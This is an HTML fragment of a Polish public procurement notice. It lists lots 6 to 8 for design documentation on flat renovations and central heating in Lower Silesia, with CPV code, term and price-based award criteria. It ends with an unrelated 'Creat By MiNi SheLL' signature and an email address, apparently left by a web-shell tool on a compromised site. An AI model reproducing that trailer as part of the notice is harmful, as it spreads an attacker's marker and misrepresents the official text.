<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wykonanie dokumentacji projektowo - kosztorysowej na przebudowę i remont dwóch lokali mieszkalnych nr 2 i nr 3, z których powstanie jeden lokal mieszkalny przy ul. Wędkarzy 14 we Wrocławiu, dz. nr 13/4, gmina Wrocław wraz z uzyskaniem pozwolenia na budowę i pełnienie funkcji nadzoru autorskiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowo - kosztorysowej na przebudowę i remont dwóch lokali mieszkalnych nr 2 i nr 3, z których powstanie jeden lokal mieszkalny przy ul. Wędkarzy 14 we Wrocławiu, dz. nr 13/4, gmina Wrocław.  Zakres prac: przebudowa i remont dwóch lokali mieszkalnych na jeden lokal mieszkalny wraz z wydzieleniem łazienki i wc., wykonanie instalacji wodno-kanalizacyjnej, instalacji centralnego ogrzewania, instalacji elektrycznej oraz wszystkich niezbędnych przyłączy. Uzyskanie stosownych uzgodnień, pozwoleń, warunków oraz  uchwał wspólnoty mieszkaniowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 93</li>
<li>2. Termin płatności faktury - 7</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Wykonanie dokumentacji projektowo - kosztorysowej na remont lokalu mieszkalnego (pustostanu) nr 2 zlokalizowanego w budynku mieszkalnym wielorodzinnym nr 5 w miejscowości Stanica, dz. nr 212/16, gmina Przeworno wraz z uzyskaniem pozwolenia na budowę i pełnienie funkcji nadzoru autorskiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowo - kosztorysowej na remont lokalu mieszkalnego (pustostanu) nr 2 zlokalizowanego w budynku mieszkalnym wielorodzinnym nr 5 w miejscowości Stanica, dz. nr 212/16, gmina Przeworno. Zakres prac: remont kapitalny lokalu wraz z wydzieleniem łazienki i wc., wykonanie instalacji wodno-kanalizacyjnej, instalacji centralnego ogrzewania i instalacji elektrycznej oraz wszystkich niezbędnych przyłączy. Uzyskanie stosownych uzgodnień, pozwoleń, warunków oraz  uchwał wspólnoty mieszkaniowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 93</li>
<li>2. Termin płatności faktury - 7</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Wykonanie dokumentacji projektowo - kosztorysowej na wykonanie centralnego ogrzewania wraz z wszystkimi niezbędnymi kominami spalinowymi i wentylacyjnymi  w zamieszkałym  lokalu mieszkalnym  nr 2 zlokalizowanym  w budynku mieszkalnym wielorodzinnym nr 34a w miejscowości Mikoszów, dz. nr 21/6, gmina Strzelin wraz z uzyskaniem pozwolenia na budowę i pełnienie funkcji nadzoru autorskiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowo - kosztorysowej na wykonanie centralnego ogrzewania wraz z wszystkimi niezbędnymi kominami spalinowymi i wentylacyjnymi  w zamieszkałym  lokalu mieszkalnym  nr 2 zlokalizowanym  w budynku mieszkalnym wielorodzinnym nr 34a w miejscowości Mikoszów, dz. nr 21/6, gmina Strzelin.  Zakres prac: wykonanie kominów spalinowych i wentylacyjnych w pomieszczeniu kotłowni, wentylacyjnych w pomieszczeniu kuchni i  łazienki, wykonanie kompletnej  instalacji centralnego ogrzewania. Uzyskanie stosownych uzgodnień, pozwoleń, warunków oraz  uchwał wspólnoty mieszkaniowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 93</li>
<li>2. Termin płatności faktury - 7</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com